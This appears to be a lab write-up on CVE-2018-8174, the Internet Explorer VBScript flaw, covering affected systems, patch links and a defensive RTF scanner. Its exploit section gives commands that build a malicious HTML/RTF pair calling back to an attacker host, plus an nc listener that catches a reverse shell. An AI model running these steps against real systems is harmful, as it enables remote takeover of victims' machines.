Vulnerability description
A remote code execution vulnerability exists in the way the VBScript engine handles objects in memory. The vulnerability corrupts memory in a way that allows an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited this vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative rights, the attacker could take control of the affected system and then install programs; view, change, or delete data; or create new accounts with full user rights.
In a web-based attack scenario, the attacker could host a specially crafted website designed to exploit this vulnerability through Internet Explorer and then convince users to view it. The attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine. Compromised websites, and websites that accept or host user-provided content or advertisements, could likewise contain specially crafted content that exploits this vulnerability.
Affected versions
- Windows 7
- Windows Server 2012 R2
- Windows RT 8.1
- Windows Server 2008
- Windows Server 2012
- Windows 8.1
- Windows Server 2016
- Windows Server 2008 R2
- Windows 10
- Windows 10 Server
Vulnerability detection
https://github.com/clark515/CVE_PoC/
After downloading the PoC, copy the HTML file to a web server or to the target machine.
When a system vulnerable to CVE-2018-8174 opens the HTML file in Internet Explorer, the PoC launches the calculator.
Exploit
Attack machine: Kali
Target machine: Windows 7
Download the script to Kali:
git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git
Enter the directory and generate the exploit files:
cd CVE-2018-8174_EXP/
python CVE-2018-8174.py -u http://192.168.206.128/exploit.html -o exp.rtf -i 192.168.206.128 -p 4444
- -u: URL at which the malicious HTML file will be served
- -o: name of the RTF document to generate
- -i: listening address
- -p: listening port
Copy the generated HTML and RTF files to the web root:
cp exploit.html /var/www/html/
cp exp.rtf /var/www/html/
Start the apache2 service:
service apache2 start
Use nc to listen on the chosen port:
nc -lvvp 4444
When the target opens the constructed HTML file in the IE browser, the listener receives a shell:
http://192.168.206.128/exploit.html
The nc listener on the attack machine then shows the incoming session.
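The RTF produced by the -o option above, and the Office-document vector from the description, are what a defender most often has to triage. The following checker is an added example, not code from the page or from the exploit project; it assumes the document carries the link as an OLE object whose stream contains a URL moniker (CLSID_StdURLMoniker) and/or a plain URL, and the sample RTF it scans is constructed here for illustration.

```python
import re

# CLSID_StdURLMoniker {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B} as stored on disk
# (first three fields little-endian). Its presence in an OLE object stream means
# the object links out to a URL rather than carrying embedded data.
URL_MONIKER_CLSID = bytes.fromhex("e0c9ea79f9bace118c8200aa004ba90b")

# \objdata groups hold the OLE object stream as a run of hex digits.
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]+)")
ASCII_URL_RE = re.compile(rb"https?://[\x21-\x7e]+")
UTF16_URL_RE = re.compile(rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[\x21-\x7e]\x00)+")


def extract_objdata(rtf: bytes) -> list:
    """Decode every \\objdata hex blob found in the RTF bytes."""
    blobs = []
    for m in OBJDATA_RE.finditer(rtf):
        hexdata = re.sub(rb"\s", b"", m.group(1))
        hexdata = hexdata[: len(hexdata) - len(hexdata) % 2]  # drop a dangling nibble
        blobs.append(bytes.fromhex(hexdata.decode("ascii")))
    return blobs


def find_urls(blob: bytes) -> list:
    """Return URLs stored as ASCII or UTF-16LE inside a decoded object stream."""
    urls = {m.group(0).decode("ascii") for m in ASCII_URL_RE.finditer(blob)}
    urls |= {m.group(0).decode("utf-16-le") for m in UTF16_URL_RE.finditer(blob)}
    return sorted(urls)


def scan_rtf(rtf: bytes) -> dict:
    """Summarise the OLE objects in an RTF file; 'suspicious' means one links to a URL."""
    result = {"objects": 0, "url_moniker": False, "urls": []}
    for blob in extract_objdata(rtf):
        result["objects"] += 1
        if URL_MONIKER_CLSID in blob:
            result["url_moniker"] = True
        result["urls"].extend(find_urls(blob))
    result["suspicious"] = result["url_moniker"] or bool(result["urls"])
    return result


# Constructed sample (hypothetical, not a real exploit file): a minimal RTF whose
# single OLE object carries the URL moniker CLSID and a UTF-16LE link to the
# server address used in the walkthrough above.
_SAMPLE_STREAM = b"\x01\x05\x00\x00" + URL_MONIKER_CLSID + \
    "http://192.168.206.128/exploit.html".encode("utf-16-le")
SAMPLE_RTF = b"{\\rtf1{\\object\\objautlink{\\*\\objdata " + _SAMPLE_STREAM.hex().encode() + b"}}}"

if __name__ == "__main__":
    print(scan_rtf(SAMPLE_RTF))
```

A document flagged as suspicious is not proof of CVE-2018-8174 in particular, but an RTF that links an OLE object to a remote HTML page is exactly the shape a defender should quarantine and inspect, and the extracted URL gives the address to block or hunt for in proxy logs.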
Fix
Patch address:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8174
Select the corresponding system version; for example, I am on a 32-bit Windows 7 system.
Run the downloaded update directly.
Reference
https://www.freebuf.com/vuls/224379.html